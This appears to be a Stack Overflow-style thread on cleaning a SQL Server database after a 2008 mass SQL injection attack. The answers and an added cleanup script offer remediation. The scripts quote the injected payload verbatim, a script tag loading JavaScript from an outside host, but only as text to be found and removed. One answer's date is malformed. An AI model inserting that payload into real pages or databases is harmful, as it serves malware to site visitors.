What is the best way to clean up after SQL injection?

I was assigned the maintenance of a non-profit website that recently fell victim to an SQL injection attack. Someone used a form on the site to append text to every available text field in the database (varchar, nvarchar, etc.), which, when rendered as HTML, includes and executes a JavaScript file.

A Google search on the URL shows that it comes from Romanian or Chinese mail spammers, but that's not what matters right now.

I went through and manually deleted the text from the fields that appear on most of the visible and popular pages of the site, but I'm curious what the best programmatic way would be to remove the text from the other text fields on the site.

Obviously there is still more to be done (hardening the site against SQL injection, using something like Markdown instead of storing HTML, etc.), and I am working on that, but for now I really need a good way to go in and remove the inserted text. I know what the exact text is; it is the same every time and is always appended to the end of any text field. I can't just delete all the HTML from the database at this point, and I don't know when it happened, so I can't just go back to a backup. In addition, the site is hosted on a shared host, and I cannot connect directly to the database using the SQL Server tools. I can execute queries against it, so if there is any way to write a SQL update statement that says "find all text fields in all tables in the entire database and do this to clean them," that would be best.

+8
security sql database sql-server
Aug 28 '08 at 14:29
4 answers

Restore the data from a recent backup.

+5
Aug 28 '08 at 14:31

I was a victim too, and you can use this to clean up:

    -- Truncates each affected value at the first '</title' it contains.
    UPDATE Table
    SET TextField = SUBSTRING(TextField, 1, CHARINDEX('</title', TextField) - 1)
    WHERE ID IN (SELECT ID FROM Table WHERE CHARINDEX('</title', TextField, 1) > 0)
+2
Oct 08 2018-10-10

Assuming you are the victim of the same attack as everyone else, SQLMenace's code is close. However, this attack uses several different script URLs, so you'll have to tweak it to make sure it matches the URL you see in your database.

I also wrote about this, and my solution code included a more general cleanup.

The important point is that the very first thing you need to do is take the site down. Right now you are actively serving malware to your users, and that may lead to legal repercussions later. Put up a placeholder page so your users aren't left in the dark, but don't keep serving the malware. Then fix the site to make sure it is no longer vulnerable to injection. The easiest way to do this for this particular attack is simply to revoke the sysobjects / syscolumns permissions from your web user, but you will also want to do a more thorough cleanup, or it's only a matter of time until you're hit again. Then you can use the code to clean up the site and put it back live.

+1
Aug 28 '08 at 14:44
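The more general cleanup this answer refers to, written out here as an added example (this is not the code from the answer's blog post or from anyone in this thread). It enumerates every character column in every user table through INFORMATION_SCHEMA, first counts the rows that end in the payload so you can review what will be touched, and only then removes it. The payload value, the @DryRun switch and the requirement for SQL Server 2005 or later (NVARCHAR(MAX), sp_executesql) are assumptions made for this example; the payload shown is the one from the cursor script in the last answer, and you must replace it with the string you actually see in your own data, since this attack used several different script URLs.

```sql
-- Added example (not code from the thread): generalized cleanup for a string that
-- an injection attack appended to every character column in the database.
-- Assumptions: SQL Server 2005 or later, and a login that can read
-- INFORMATION_SCHEMA and update every user table (run it as an admin, not as
-- the web user).
SET NOCOUNT ON;

-- The exact string found in the data. Replace with what you see in your database.
DECLARE @Payload NVARCHAR(4000);
SET @Payload = N'"></title><script src="http://1.verynx.cn/w.js"></script><!--';

DECLARE @DryRun BIT;
SET @DryRun = 1;  -- 1 = only report matches; 0 = also perform the UPDATEs

-- LIKE treats %, _ and [ as wildcards, so escape them to match the payload literally.
DECLARE @Pattern NVARCHAR(4000);
SET @Pattern = N'%' +
    REPLACE(REPLACE(REPLACE(REPLACE(@Payload, N'\', N'\\'),
                            N'%', N'\%'), N'_', N'\_'), N'[', N'\[');

IF OBJECT_ID('tempdb..#hits') IS NOT NULL DROP TABLE #hits;
CREATE TABLE #hits (sch SYSNAME, tbl SYSNAME, col SYSNAME, hits INT);

DECLARE @Count NVARCHAR(MAX), @Update NVARCHAR(MAX);
SET @Count = N'';
SET @Update = N'';

-- Build one COUNT and one UPDATE statement per character column of every user
-- table. INFORMATION_SCHEMA is used rather than sysobjects/syscolumns, so this
-- keeps working for an admin login after those views are denied to the web user.
SELECT
    @Count = @Count
        + N'INSERT #hits SELECT ' + QUOTENAME(c.TABLE_SCHEMA, '''')
        + N', ' + QUOTENAME(c.TABLE_NAME, '''')
        + N', ' + QUOTENAME(c.COLUMN_NAME, '''') + N', COUNT(*) FROM '
        + QUOTENAME(c.TABLE_SCHEMA) + N'.' + QUOTENAME(c.TABLE_NAME)
        + N' WHERE ' + QUOTENAME(c.COLUMN_NAME) + N' LIKE @p ESCAPE N''\'';' + CHAR(10),
    @Update = @Update
        + N'UPDATE ' + QUOTENAME(c.TABLE_SCHEMA) + N'.' + QUOTENAME(c.TABLE_NAME)
        + N' SET ' + QUOTENAME(c.COLUMN_NAME) + N' = REPLACE(CAST('
        + QUOTENAME(c.COLUMN_NAME) + N' AS NVARCHAR(MAX)), @needle, N'''')'
        + N' WHERE ' + QUOTENAME(c.COLUMN_NAME) + N' LIKE @p ESCAPE N''\'';' + CHAR(10)
FROM INFORMATION_SCHEMA.COLUMNS c
JOIN INFORMATION_SCHEMA.TABLES t
  ON t.TABLE_SCHEMA = c.TABLE_SCHEMA AND t.TABLE_NAME = c.TABLE_NAME
WHERE t.TABLE_TYPE = 'BASE TABLE'
  AND c.DATA_TYPE IN ('char', 'nchar', 'varchar', 'nvarchar', 'text', 'ntext');

-- The payload and pattern travel as parameters and are never concatenated into
-- the statement text, so the cleanup script is not itself injectable.
EXEC sp_executesql @Count, N'@p NVARCHAR(4000)', @p = @Pattern;

-- Review this list before flipping @DryRun to 0.
SELECT sch, tbl, col, hits FROM #hits WHERE hits > 0 ORDER BY sch, tbl, col;

IF @DryRun = 0
BEGIN
    BEGIN TRANSACTION;
    -- REPLACE() removes every occurrence, so a row hit more than once is also cleaned.
    -- The CAST to NVARCHAR(MAX) is needed because REPLACE() rejects text/ntext.
    EXEC sp_executesql @Update,
        N'@p NVARCHAR(4000), @needle NVARCHAR(4000)',
        @p = @Pattern, @needle = @Payload;
    COMMIT TRANSACTION;
END
```

Run it once with @DryRun = 1 and compare the reported tables and columns against what you expect; if a column shows up that should never contain HTML at all, that is the input field the attacker came in through and the first place to fix before putting the site back up.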

This will change that value. It would also be wise to revoke sysobjects permissions from the user your site runs as, and of course to sanitize your input.

    -- Walks every user table (xtype = 'u') and every text-typed column:
    -- 99 = ntext, 35 = text, 231 = nvarchar, 167 = varchar.
    DECLARE @T VARCHAR(255), @C VARCHAR(4000)
    DECLARE Table_Cursor CURSOR FOR
        SELECT a.name, b.name
        FROM sysobjects a, syscolumns b
        WHERE a.id = b.id AND a.xtype = 'u'
          AND (b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167)
    OPEN Table_Cursor
    FETCH NEXT FROM Table_Cursor INTO @T, @C
    WHILE (@@FETCH_STATUS = 0)
    BEGIN
        -- Only PRINTs an UPDATE for each column that contains the payload, so you
        -- can review the statements before running them yourself.
        -- Note: REPLACE() does not accept text/ntext arguments, so for those
        -- columns CAST the column to VARCHAR(MAX)/NVARCHAR(MAX) first.
        EXEC('if exists (select 1 from [' + @T + '] where [' + @C + '] like ''%"></title><script src="http://1.verynx.cn/w.js"></script><!--'')
              begin
                  print ''update [' + @T + '] set [' + @C + '] = replace([' + @C + '], ''''"></title><script src="http://1.verynx.cn/w.js"></script><!--'''', '''''''') where [' + @C + '] like ''''%"></title><script src="http://1.verynx.cn/w.js"></script><!--''''''
              end')
        FETCH NEXT FROM Table_Cursor INTO @T, @C
    END
    CLOSE Table_Cursor
    DEALLOCATE Table_Cursor

I wrote about this a while ago: Microsoft has released tools to address SQL injection attacks.

0
Aug 28 '08 at 14:33
